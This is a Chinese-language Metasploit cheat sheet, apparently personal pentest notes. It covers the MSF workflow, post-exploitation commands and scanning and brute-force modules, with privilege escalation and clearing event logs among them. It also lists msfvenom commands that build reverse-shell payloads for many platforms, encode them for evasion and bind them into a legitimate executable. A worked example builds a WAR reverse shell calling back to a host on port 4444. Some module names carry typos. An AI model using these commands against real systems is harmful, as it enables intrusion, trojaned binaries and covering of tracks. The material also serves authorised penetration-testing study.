Meatasploit 基础操作
MSF 渗透流程(自上而下)
序号 | 命令 | 说明 |
---|---|---|
search 模块 | 根据收集的信息搜索 | |
info 模块名 | 查看模块信息 | |
use 模块名 | 选择模块 | |
show payloads | 查看可以使用的攻击载荷 | |
set payload | 设置攻击载荷 | |
show targets | 查看攻击目标信息 | |
show options/advance | 查看基本参数和高级参数 | |
set name | 设置参数值 | |
exploit/run | 执行攻击 | |
session -l | 列出会话 | |
session -i Id | 切换到指定会话 |
MSF 基本命令
命令 | 说明 |
---|---|
msfconsole | 启动终端 |
banner | 展示 banner |
help /? | 查看帮助, help + 命令 |
search | 搜索漏洞和利用数据库 |
info | 查看模块的信息 |
use | 使用模块 |
show options | 查看所使用模块需要配置的参数 |
set | 设置参数值 |
run/exploit | 执行模块 |
back | 退回到主界面 |
quit/exit | 退出 msf |
核心模块说明
模块名 | 作用 |
---|---|
Exploits | 利用模块 |
Payloads | 攻击载荷模块 |
Auxiliary | 辅助模块 |
Post | 后渗透模块 |
Encoders | 编码模块 |
Evasion | 免杀模块 (没什么暖用) |
Nops | 空模块 |
Meterpreter 中常用命令(这时你已经连上了 靶机)
命令 | 说明 |
---|---|
sysinfo | 查看目标机系统信息 |
getuid | 查看用户 |
pwd/getIwd | 查看当前目录 |
cd/Icd | 切换目录 |
background | 把当前会话放到后台 |
sessions -i id | 切换到指定会话 |
sessions -k id | 杀死指定会话 |
shell | 进入目标主机 shell |
upload file | 向目标主机上传文件 |
download file | 从目标主机下载文件 |
search | 在目标主机上搜索文件 search -f test |
execute | 在目标主机执行程序 execute -H -i -f cmd.exe |
getsystem | 提权 |
clearev | 清楚痕迹 |
MSF 信息收集常用模块
作用 | 命令 |
---|---|
主机发现 | use auxiliary/scanner/discovery/arp_sweep |
端口扫描 | use auxiliary/scanner/portscan/tcp |
目录扫描 | use auxiliary/scanner/http/dir_scanner |
SSH爆破 | use auxiliary/scanner/ssh/ssh_login |
mysql 服务发现 | use auxiliary/scanner/mysql/mysql_version |
smb 服务发现 | use auxiliary/scancer/smb/smb_version |
telnet 服务发现 | use auxiliary/scanner/telnet/telnet_version |
rdp 服务发现 | use auxiliary/scanner/rdp/rdp_scanner |
反弹 shell 相关
常用的反弹 shell
相关程序利用 | 命令 |
---|---|
普通生成 | msfvenom -p windows/meterpreter/reverse_tcp -f exe -o C:\back.exe |
编码处理型 | msfvenom -p windows/meterpreter/reverse_tcp -i3 -e x86/shikata_ga_nai -f exe -o C:\back.exe |
捆绑 | msfvenom -p windows/meterpreter/reverse tcp -platform windows -a x86 -x C:\nomal.exe -k -f exe -o C:\shell.exe |
Windows | msfvenom -platform windows -a x86 -p windows/x64/meterpreter/reverse_tcp -f exe -o C:\back.exe |
Linux | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= |
MAC | msfvenom -p osx/x86/shell_reverse_tcp LHOST= |
PHP | msfvenom -p php/meterpreter_reverse_tcp LHOST= |
Asp | msfvenom -p windows/meterpreter/reverse_tcp LHOST= |
Aspx | msfvenom -p windows/meterpreter/reverse_tcp LHOST= |
JSP | msfvenom -p java/jsp_shell reverse_tcp LHOST= |
War | msfvenom -p java/jsp_shell reverse_tcp LHOST= |
Bash | msfvenom -p cmd/unix/reverse_bash LHOST= |
Perl | msfvenom -p cmd/unix/reverse_perl LHOST= |
Python | msfvenom -p python/meterpreter/reverser_tcp LHOST= |
反弹 shell 的利用案例
metasploit 外 使用 msfvenom 命令生成 反弹 shell 文件
1 | msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.142.132 lport=4444 -f war -o kali.war |
metasploit 中利用
1 | use exploit/multi/handler |
metasploit 脚本使用案例
tomcat 密码爆破
1 | use auxiliary/scanner/http/tomcat_mgr_login |